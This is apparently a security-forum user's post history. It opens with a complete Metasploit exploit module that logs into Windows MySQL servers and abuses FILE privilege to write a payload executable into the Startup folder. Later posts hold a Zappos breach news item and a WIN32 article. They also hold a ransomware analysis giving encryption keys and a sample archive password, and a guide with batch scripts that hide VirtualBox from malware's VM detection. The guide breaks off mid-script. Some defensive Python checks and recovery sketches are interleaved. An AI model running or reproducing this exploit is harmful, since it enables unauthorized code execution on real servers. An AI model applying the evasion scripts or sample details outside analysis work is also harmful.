Everything posted by Aerosol
-
```ruby
##
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse',
      'Description'    => %q{
        This module takes advantage of a file privilege misconfiguration problem
        specifically against Windows MySQL servers. This module abuses the FILE
        privilege to write a payload to Microsoft's All Users Start Up directory
        which will execute every time a user logs in. The default All Users Start
        Up directory used by the module is Windows 7 friendly.
      },
      'Author'         =>
        [
          'sinn3r',
          'Sean Verity <veritysr1980[at]gmail.com'
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => 'true'
        },
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2012-5613'], #DISPUTED
          ['OSVDB', '88118'],
          ['EDB', '23083'],
          ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'MySQL on Windows', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 01 2012'
    ))

    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
        OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/'])
      ])
  end

  def check
    m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
    return Exploit::CheckCode::Safe unless m
    return Exploit::CheckCode::Appears if is_windows?
    Exploit::CheckCode::Safe
  end

  def peer
    "#{rhost}:#{rport}"
  end

  def query(q)
    rows = []
    begin
      res = mysql_query(q)
      return rows unless res
      res.each_hash do |row|
        rows << row
      end
    rescue RbMysql::ParseError
      return rows
    end
    rows
  end

  def is_windows?
    r = query("SELECT @@version_compile_os;")
    r[0]['@@version_compile_os'] =~ /^Win/ ? true : false
  end

  def get_drive_letter
    r = query("SELECT @@tmpdir;")
    drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || ''
    drive
  end

  def upload_file(bin, dest)
    p = bin.unpack("H*")[0]
    query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
  end

  def exploit
    unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/')
      fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/")
    end

    print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
    begin
      m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
    rescue RbMysql::AccessDeniedError
      fail_with(Failure::NoAccess, "#{peer} - Access denied")
    end
    fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m

    unless is_windows?
      fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows")
    end

    begin
      drive = get_drive_letter
    rescue RbMysql::ParseError
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name")
    end
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive

    exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
    dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}"
    exe = generate_payload_exe
    print_status("#{peer} - Uploading to '#{dest}'")
    begin
      upload_file(exe, dest)
    rescue RbMysql::AccessDeniedError
      fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)")
    end

    register_file_for_cleanup("#{dest}")
  end
end
```
Source
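The misconfiguration this module depends on (an account holding FILE on a server whose secure_file_priv does not confine writes) is checkable from the DBA side. The following is an added Python example, not part of the module or of Metasploit: it parses constructed SHOW GRANTS lines to find accounts holding FILE directly or through ALL PRIVILEGES, and classifies what SELECT ... INTO DUMPFILE can reach from the value of @@secure_file_priv (an empty value means unrestricted writes anywhere the mysqld service account can write, a directory confines writes to that tree, and NULL disables server-side file operations). The grant lines and the secure_file_priv values below are constructed; the classification rules follow MySQL's documented behaviour.

```python
import re

# Constructed sample of `SHOW GRANTS FOR ...` output lines (not from any real server).
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'app'@'10.0.0.%'",
    "GRANT SELECT, INSERT ON `shop`.* TO 'app'@'10.0.0.%'",
    "GRANT FILE ON *.* TO 'report'@'%'",
    "GRANT ALL PRIVILEGES ON *.* TO 'admin'@'localhost' WITH GRANT OPTION",
]

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<account>'[^']*'@'[^']*')",
    re.IGNORECASE,
)


def accounts_with_file_priv(grant_lines):
    """Accounts holding FILE, directly or through ALL [PRIVILEGES], on the global
    scope *.* (FILE is a global-only privilege, so only *.* grants matter)."""
    hits = []
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
            hits.append(m.group("account"))
    return hits


def dumpfile_risk(secure_file_priv):
    """What SELECT ... INTO DUMPFILE/OUTFILE may write, given @@secure_file_priv:
    None (SQL NULL) -> server-side file export/import disabled entirely;
    ''              -> unrestricted: any path the mysqld service account can write
                       (the condition the module above relies on);
    a directory     -> writes confined to that directory tree."""
    if secure_file_priv is None:
        return "disabled"
    if secure_file_priv == "":
        return "unrestricted"
    return "confined"


def assess(grant_lines, secure_file_priv):
    """Combine both checks: only FILE holders on an unrestricted server can drop a
    file into an arbitrary location such as a Start Up folder."""
    holders = accounts_with_file_priv(grant_lines)
    risk = dumpfile_risk(secure_file_priv)
    return {
        "file_priv_accounts": holders,
        "dumpfile": risk,
        "exposed": holders if risk == "unrestricted" else [],
    }


if __name__ == "__main__":
    # The two queries a DBA would run to feed this; their results are constructed above:
    #   SHOW GRANTS FOR 'report'@'%';   SELECT @@secure_file_priv;
    print(assess(SAMPLE_GRANTS, ""))
```

Revoking FILE from application accounts and pointing secure_file_priv at a dedicated directory removes the write primitive the module uses; running mysqld under a low-privilege service account rather than LocalSystem limits what a DUMPFILE can reach if both are missed. Since the module's check method only confirms a login and a Windows build, the pattern worth alerting on in the general query log is a FILE-holding account issuing SELECT ... INTO DUMPFILE with a path under a Start Menu folder.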
-
Online retailer Zappos this week settled with attorneys general in nine states, agreeing to pay out $106,000 stemming from a data breach in 2012 that exposed 24 million customers' information. Massachusetts Attorney General Martha Coakley filed the settlement in Suffolk Superior Court on Wednesday, as did the AGs of Arizona, Connecticut, Florida, Kentucky, Maryland, North Carolina, Ohio and Pennsylvania. Under the agreement, the Las Vegas company must also take the necessary actions to better protect its customers' information going forward.

"Our office will continue to hold retailers accountable for failing to follow their own policies regarding consumer data that they maintain, and make sure that all companies have reasonable data security measures in place," Coakley said in a press release on Wednesday.

Each state is getting roughly the same cut of the $106,000; Massachusetts, which had approximately 740,000 residents affected, will receive more than $11,000. As part of the agreement, Zappos will have to maintain and comply with its information security policies and provide each attorney general with those policies and an account of how they pertain to customer information. The company must also undergo a third-party audit and provide the audit report to the attorneys general, along with copies of reports that show how it complies with the Payment Card Industry Data Security Standard, for two years. In addition, to bolster security awareness, the e-merchandiser must provide annual training to its 1,500 employees.

Attackers initially infiltrated the company's network in January 2012 via a server in Kentucky. Files on that server were ultimately discovered to contain customers' names, billing and shipping addresses, telephone numbers, log-in credentials and the last four digits of their credit card numbers. Following the breach, the company, which sells clothing, accessories and other merchandise aside from shoes, expired all affected users' passwords and required them to reset them. According to Coakley, aside from the last four digits of their cards, there was no other payment card information — no full debit or credit card numbers — implicated in the breach.
Source
-
-
If anyone is interested: https://rstforums.com/forum/93955-security-hacking-apps-android-devices.rst
-
@Nytro where do you find these, man? The second one is EPIC
-
Thanks, it would have been perfect for phone pranks if it weren't for this time limit...
-
Website Hacking, Part VI: Input Validation and Filtering in PHP
Aerosol replied to Aerosol's topic in Securitate web
@axeman18 they are here on the forum, hold on!
#1 https://rstforums.com/forum/93500-website-hacking-101-a.rst
#2 https://rstforums.com/forum/93501-website-hacking-101-part-ii.rst
#3 https://rstforums.com/forum/93503-website-hacking-101-part-iii.rst
#4 https://rstforums.com/forum/93504-website-hacking-part-iv-tips-better-website-security.rst
#5 https://rstforums.com/forum/93499-website-hacking-part-v.rst
-
Below is a fairly interesting article!
==================================

Beginning in the fall of 2014, something exciting started to happen. Microsoft's new approach of low-cost (and sometimes free) versions of Windows (x86) for OEMs building small and low-cost devices began to take shape. There is little doubt in the mind of this developer that this was a smart move on their part. But things would not really have taken shape if it were not for Intel's amazing efforts in bringing to market extremely small, yet powerful PC form factors: the 7-inch Windows tablets, TV-box style mini-PCs and soon the PC-stick form factor. While this likely opens up all sorts of possibilities and markets for consumer-oriented products, it also opens up all sorts of possibilities for education and business. Inexpensive $99 Windows tablets bring many new options for business and education. TV-box and PC-on-a-stick Windows devices turn already available large-screen televisions into powerful educational and business tools, and also bring many opportunities in the consumer markets.

What this means for developers

These amazing new devices, though, come with a hitch. While in many ways they may provide even more power and choices than either Android or Chrome (in my opinion), they also bring challenges for Windows software developers. Much of software development has gone cross-platform today, and with that come limitations which are simply part of the nature of cross-platform design. Cross-platform usually means some compromise compared to coding for a native platform. Cross-platform tends to lean towards machine-independent programming methodologies, such as scripting languages or compiling on the fly on the end user's machine. Yet experienced programmers likely recognize the raw power of using actual native code compilers for a specific platform. One can code for high performance using every tool available for that platform as well as for the hardware (in this case Intel x86 SoCs).

The new Windows PC form factors, though, bring a challenge to developers, since some current development systems tend to lean towards the more powerful PC platforms rather than the new PC form factors with minimal hardware. For years the lowly Intel Atom CPU (actually an SoC, which means System on a Chip) was sadly the laughing stock among some software developers. Having been spoiled by the ICore CPUs, large and fast SSD drives and huge amounts of RAM (8, 16 or more gigabytes), software developers, if they were honest about it, likely didn't want to see their software run on such lowly devices. Rather than see the Atom SoC as a benefit (small size, low power requirement, low cost), they likely saw it as a problem to be avoided. But the new breed of tiny Windows devices, along with the new low-cost Windows solutions from Microsoft, are bringing some very exciting opportunities for developers, if they can simply realize the opportunities here. The Intel Atom SoC is no laughing stock in my mind, but a very smart, well-calculated design which, combined with the low-cost Windows, is an industry game changer. Low cost, small size and reasonable power (if properly used) make this a very positive thing for the tech industry, which should be utilized. As a long-time programmer who has helped a number of businesses find cost-effective solutions to their computer and software needs, I have found that cost matters. If a business (or a school) can accomplish something for significantly less money while still getting a solid solution, then it is something a software developer or IT person should seriously consider and promote. So how does a software developer help others get more from the new generation of small Windows devices?

It's been there all the time, but you may not have noticed

One of the amazing things I have noticed about the Windows operating system over the years has been how consistent it has been in supporting the core WIN32 API. Programming techniques I learned over 15 years ago still work almost flawlessly today. I have been an active WIN32 programmer for the last 15 years now, and the more I learn the better it gets. But what really amazed me is how tiny native-coded WIN32 apps can be, how fast they can run and how few hardware resources they require. Since Windows 95, core features in Windows have not changed, and they also demonstrate the well-planned design of the core operating system. I have learned how to do all sorts of tricks with the simple and lowly DLL (Dynamic Link Library). It is simple to design software which can even deal with the slight changes in the operating system over the years while maintaining full backward compatibility, even as far back as Windows 95. Even the lowly GDI still has some amazingly raw power in it. One of my favorite features in the WIN32 API is the lowly DIBSection (device-independent bitmap). It has been there since Windows 95, and yet this simple API can be used to build all sorts of powerful homemade graphics engines. Once I tapped into the DIBSection APIs, all sorts of possibilities arose. Another feature of the Windows API which still amazes me is the customization built into it. Things like OwnerDraw, CustomDraw, subclassing and superclassing allow programmers to customize almost anything. Even core API functionality like the Common Dialogs was designed for customization: one can easily create one's own "hook" procedure for them and change their functionality. An experienced WIN32 programmer, rather than seeing limitations in the WIN32 API, more likely sees all sorts of possibilities.

The real power of the WIN32 API

But the real power of the WIN32 API is how few resources it requires and how tiny and fast one's applications are. The typical programmer today requires a heavyweight PC for development, and their tools usually take up not megabytes but many gigabytes of disk space just to be installed. Not so for WIN32 programmers. Some WIN32 programmers' entire development system (aside from API docs, of course, but those one can get online) may only take a few megabytes of disk space. In my case the IDE and compiler I use only take up about 20 megabytes of disk space, and I can run it on literally any Windows (x86) PC made in the last 15 years, possibly even further back, with as little as 256 MB of RAM or less. My Visual Designer front end, which my company built, as well as a complex, full-featured GUI framework, only takes about 3 megabytes of disk space (plus another 6 megabytes for the help file). It too can most likely run on any Windows PC made during the last 15 years. Native code compilers are an area which deserves a closer look by software developers. The coming mini-device Windows PCs can be made to perform amazingly well, despite their limitations, if we as programmers learn how to tap into the native WIN32 API. The extra expense in software development will be easily compensated by the savings when using these low-cost devices. Imagine a school system only paying $99 per student for a tablet and still getting a powerful system. Imagine the savings to businesses from finding ways to use such inexpensive devices. Personally, I would like to see a real Windows device of Raspberry Pi size and cost. Get rid of the operating system bloat (like .NET) and provide simple and easy-to-use compilers capable of tapping into the WIN32 API directly, and it is conceivable to have a tiny Raspberry-Pi-sized Windows PC device which could sell for only $49 (or less) and be more powerful than the Pi. If you doubt the importance of native code compiling, watch the video of Herb Sutter's talk "Why C++?". Still doubt the power of writing software using the native WIN32 API (as well as OpenGL, DirectX, etc.)? Check out two programming libraries this French developer has created: GDImage, a powerful graphics engine with a tiny footprint, and WinLift, a powerful window skinning engine, also with a tiny footprint. Both were written using native WIN32 coding, even without any of the object-oriented classes typical of C++. Both were written using PowerBASIC for 32-bit Windows, and GDImage was ported to C++ for a 64-bit version.

2015 will be an interesting year for tiny Windows (x86) devices
Source
-
Attached are two variants of a new crypto malware that first showed up a few days ago.

The encryption of the first variant is rather simplistic. It just does a simple XOR using a static key that is used on every system. The key used is 0x3035353331623139626238343662313863303966393739656562343239616433.

The second variant changed the encryption scheme. It now generates a new per-infection key on each system. This per-infection key appears to be the SHA256 of something. I didn't look into what exactly yet, because the malware author failed at securing his server and left all generated keys open to be downloaded by anyone. If someone wants a dump of all keys, please let me know. The per-infection key is then used to derive a new encryption key for every 0x4000-byte block of a file that is being encrypted. The key for the block is essentially the SHA256 of the per-infection key plus the file name including path plus the index of the block being encrypted, starting with 1. So if the per-infection key is d9ae3f2910a4de28315216bd1152746db1b539fa3b545ac7d24401f3d39ec581 for example and the file being encrypted is located at C:\file.ext, the first 0x4000 bytes would be encrypted using SHA256("d9ae3f2910a4de28315216bd1152746db1b539fa3b545ac7d24401f3d39ec581C:\file.ext1"), the second 0x4000 bytes would be encrypted with SHA256("d9ae3f2910a4de28315216bd1152746db1b539fa3b545ac7d24401f3d39ec581C:\file.ext2") and so on. I didn't look into how the malware derives the key stream it uses to XOR the original bytes with from the SHA256 yet, due to lack of time. I hope to get to it later today, but I am not that familiar with VB6 and the disassembled code looks horrible. So if one of you with more experience in reversing VB6 code wants to give it a shot, the function that encrypts a block using the derived SHA256 as the key for the block is located at 0x0042FF80 in the variant 2 sample.

pclock_variants.rar
Pass: infected
Source
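To make the two key schedules concrete for anyone triaging encrypted files, here is an added Python sketch; it is not code from the post or from the samples. It encodes exactly what the post states: the variant-1 static key (whose 32 bytes, decoded, are themselves the printable hex string 05531b19bb846b18c09f979eeb429ad3) and the variant-2 per-block key SHA256(per-infection key || full path || 1-based block index) for each 0x4000-byte block. The post does not describe how the 32-byte block key is expanded into the XOR keystream, so the code stops at deriving the block keys; applying the variant-1 key cyclically is an assumption, as the post only says "simple XOR using a static key". The per-infection key and path are the post's own worked-example values.

```python
import hashlib

BLOCK_SIZE = 0x4000  # the post: a fresh key for every 0x4000-byte block

# Variant 1: static key quoted in the post (same on every infected system).
VARIANT1_STATIC_KEY = bytes.fromhex(
    "3035353331623139626238343662313863303966393739656562343239616433"
)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data against key applied cyclically. ASSUMPTION: the post only says
    'simple XOR using a static key'; cyclic application is the usual reading."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def variant1_recover(ciphertext: bytes) -> bytes:
    """XOR is its own inverse, so one routine both applies and undoes variant 1."""
    return xor_repeating(ciphertext, VARIANT1_STATIC_KEY)


def variant2_block_material(per_infection_key_hex: str, file_path: str, index: int) -> str:
    """String hashed for block `index` (1-based), as in the post's worked example:
    per-infection key as hex text || full path || decimal block index."""
    return f"{per_infection_key_hex}{file_path}{index}"


def variant2_block_key(per_infection_key_hex: str, file_path: str, index: int) -> bytes:
    material = variant2_block_material(per_infection_key_hex, file_path, index)
    return hashlib.sha256(material.encode("utf-8")).digest()


def variant2_block_keys(per_infection_key_hex: str, file_path: str, file_size: int) -> list:
    """One 32-byte key per 0x4000-byte block; the last block may be short and an
    empty file needs no key at all (edge handling assumed, not stated in the post)."""
    n_blocks = (file_size + BLOCK_SIZE - 1) // BLOCK_SIZE
    return [variant2_block_key(per_infection_key_hex, file_path, i) for i in range(1, n_blocks + 1)]


def split_blocks(data: bytes) -> list:
    """Cut file content into the 0x4000-byte blocks the per-block keys line up with."""
    return [data[i:i + BLOCK_SIZE] for i in range(0, len(data), BLOCK_SIZE)]


# Worked example values from the post.
EXAMPLE_KEY = "d9ae3f2910a4de28315216bd1152746db1b539fa3b545ac7d24401f3d39ec581"
EXAMPLE_PATH = r"C:\file.ext"

if __name__ == "__main__":
    print("variant 1 key as text:", VARIANT1_STATIC_KEY.decode("ascii"))
    for i, k in enumerate(variant2_block_keys(EXAMPLE_KEY, EXAMPLE_PATH, BLOCK_SIZE + 1), 1):
        print(i, variant2_block_material(EXAMPLE_KEY, EXAMPLE_PATH, i), k.hex())
```

Two consequences of the scheme worth noting for recovery work: for variant 2 the only secret input is the per-infection key (the ones the post says were left downloadable), but the full original path is also key material, so a file that has been moved or renamed since encryption must be keyed with its path at encryption time, not its current one. For variant 1 a known-plaintext check (a file header such as a PE or PDF magic) against the first 32 bytes confirms whether the static key applies before touching the rest.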
-
Step-by-step guide for VirtualBox Hardened (4.3.14+) VM detection mitigation configuring. Later, if nothing changes in the Oracle product, this will be moved to the public forums. This guide and AntiVMDetect only apply to the x86-64 Windows platform.

The guide consists of the following parts:
1) VirtualBox installation
2) AntiVMDetect installation and configuring
3) VirtualBox VM installation and configuring

1) VirtualBox installation

1.1) Do a clean installation of the latest VirtualBox. Clean means you must first uninstall any other versions of VirtualBox and reboot Windows to complete the uninstallation. This ensures that no old VBox files are left in system memory and on disk. Unfortunately the VBox setup sometimes can't do a complete removal without a reboot.

1.2) Start the installation and select the VirtualBox components to install as shown in the figure below. DO NOT INSTALL VirtualBox Networking, otherwise you will have problems with parts 2 and 3 of this guide, as the VirtualBox driver cannot be stopped when VirtualBox networking is active. This feature is pretty useless anyway; NAT will still be available for virtual machines.

2) AntiVMDetect installation and configuring

2.1) What we will target:
- DMI information;
- IDE/AHCI devices (hard disks, CD-ROMs);
- ACPI OEM information;
- Ethernet adapter MAC address;
- PXE boot data;
- ACPI DSDT (Differentiated System Description Table);
- ACPI SSDT (Secondary System Descriptor Table);
- VGA video BIOS data;
- BIOS data;
- VM splash screen (optional, just for nice looks).

How we target this: we remove all signs of Oracle/Innotek signatures inside the original data, extracted in various ways from Oracle VirtualBox itself, and then use documented and "not documented" ways to set this customized data for a specific virtual machine using batch scripts; see 2.2 for more info and an example.

2.2) Run the following commands combined in a batch script. As the parameter to the script give the full name of the virtual machine you want to use; in this example it is "sbox". PUT YOUR OWN RANDOM information in the data fields, DO NOT USE THE SAME AS BELOW, so this can't be used as detection markers.

Script for VM with IDE controller

```bat
@echo off
rem vboxman is the full path to the vboxmanage executable
rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc)
set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
set vmscfgdir=D:\Virtual\VBOX\Settings\
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Asus"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor" "5"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor" "9"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" "1"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" "0"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor" "Asus"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct" "MyBook5,2"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion" "1.0"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial" "CSN12345678901234567"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU" "FM550EA#ACB"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily" "Ultrabook"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "Asus"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "Mac-F22788AA"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "3.0"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial" "BSN12345678901234567"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "Board Loc In"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardBoardType" 10
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor" "Asus Inc."
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisType" 10
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion" "Mac-F22788AA"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial" "CSN12345678901234567"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag" "WhiteHouse"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A"
%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/ModelNumber" "Hitachi HTS543232A7A384"
%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/FirmwareRevision" "ES2OA60W"
%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/PrimaryMaster/SerialNumber" "2E3024L1T2V9KA"
%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ModelNumber" "Slimtype DVD A DS8A8SH"
%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/FirmwareRevision" "KAA2"
%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/SerialNumber" "ABCDEF0123456789"
%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIVendorId" "Slimtype"
%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIProductId" "DVD A DS8A8SH"
%vboxman% setextradata "%1" "VBoxInternal/Devices/piix3ide/0/Config/SecondaryMaster/ATAPIRevision" "KAA2"
%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "ASUS"
%vboxman% modifyvm "%1" --macaddress1 6CF0491A6E02
cd /d %vmscfgdir%
%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin"
%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin"
%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios.bin"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/LanBootRom" "%vmscfgdir%pxerom.bin"
%vboxman% modifyvm "%1" --bioslogoimagepath "%vmscfgdir%splash.bmp"
@pause
```

Script for AHCI controller

```bat
rem @echo off
rem vboxman is the full path to the vboxmanage executable
rem vmscfgdir is the path to directory that keeps vbox custom configuration data (bioses, tables etc)
set vboxman="C:\Program Files\Oracle\VirtualBox\vboxmanage.exe"
set vmscfgdir=D:\Virtual\VBOX\Settings\
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVendor" "Asus"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSVersion" "MB52.88Z.0088.B05.0904162222"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseDate" "08/10/13"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMajor" "5"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSReleaseMinor" "9"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMajor" "1"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBIOSFirmwareMinor" "0"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVendor" "Asus"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemProduct" "MyBook5,2"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemVersion" "1.0"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSerial" "CSN12345678901234567"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemSKU" "FM550EA#ACB"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemFamily" "Ultrabook"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiSystemUuid" "B5FA3000-9403-81E0-3ADA-F46D045CB676"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVendor" "Asus"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardProduct" "Mac-F22788AA"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardVersion" "3.0"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardSerial" "BSN12345678901234567"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardAssetTag" "Base Board Asset Tag#"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardLocInChass" "Board Loc In"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiBoardBoardType" 10
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVendor" "Asus Inc."
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisType" 10
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisVersion" "Mac-F22788AA"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisSerial" "CSN12345678901234567"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiChassisAssetTag" "WhiteHouse"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxVer" "Extended version info: 1.00.00"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/DmiOEMVBoxRev" "Extended revision info: 1A"
%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/ModelNumber" "Hitachi HTS543232A7A384"
%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/FirmwareRevision" "ES2OA60W"
%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port0/SerialNumber" "2E3024L1T2V9KA"
%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ModelNumber" "Slimtype DVD A DS8A8SH"
%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/FirmwareRevision" "KAA2"
%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/SerialNumber" "ABCDEF0123456789"
%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIVendorId" "Slimtype"
%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIProductId" "DVD A DS8A8SH"
%vboxman% setextradata "%1" "VBoxInternal/Devices/ahci/0/Config/Port1/ATAPIRevision" "KAA2"
%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/AcpiOemId" "ASUS"
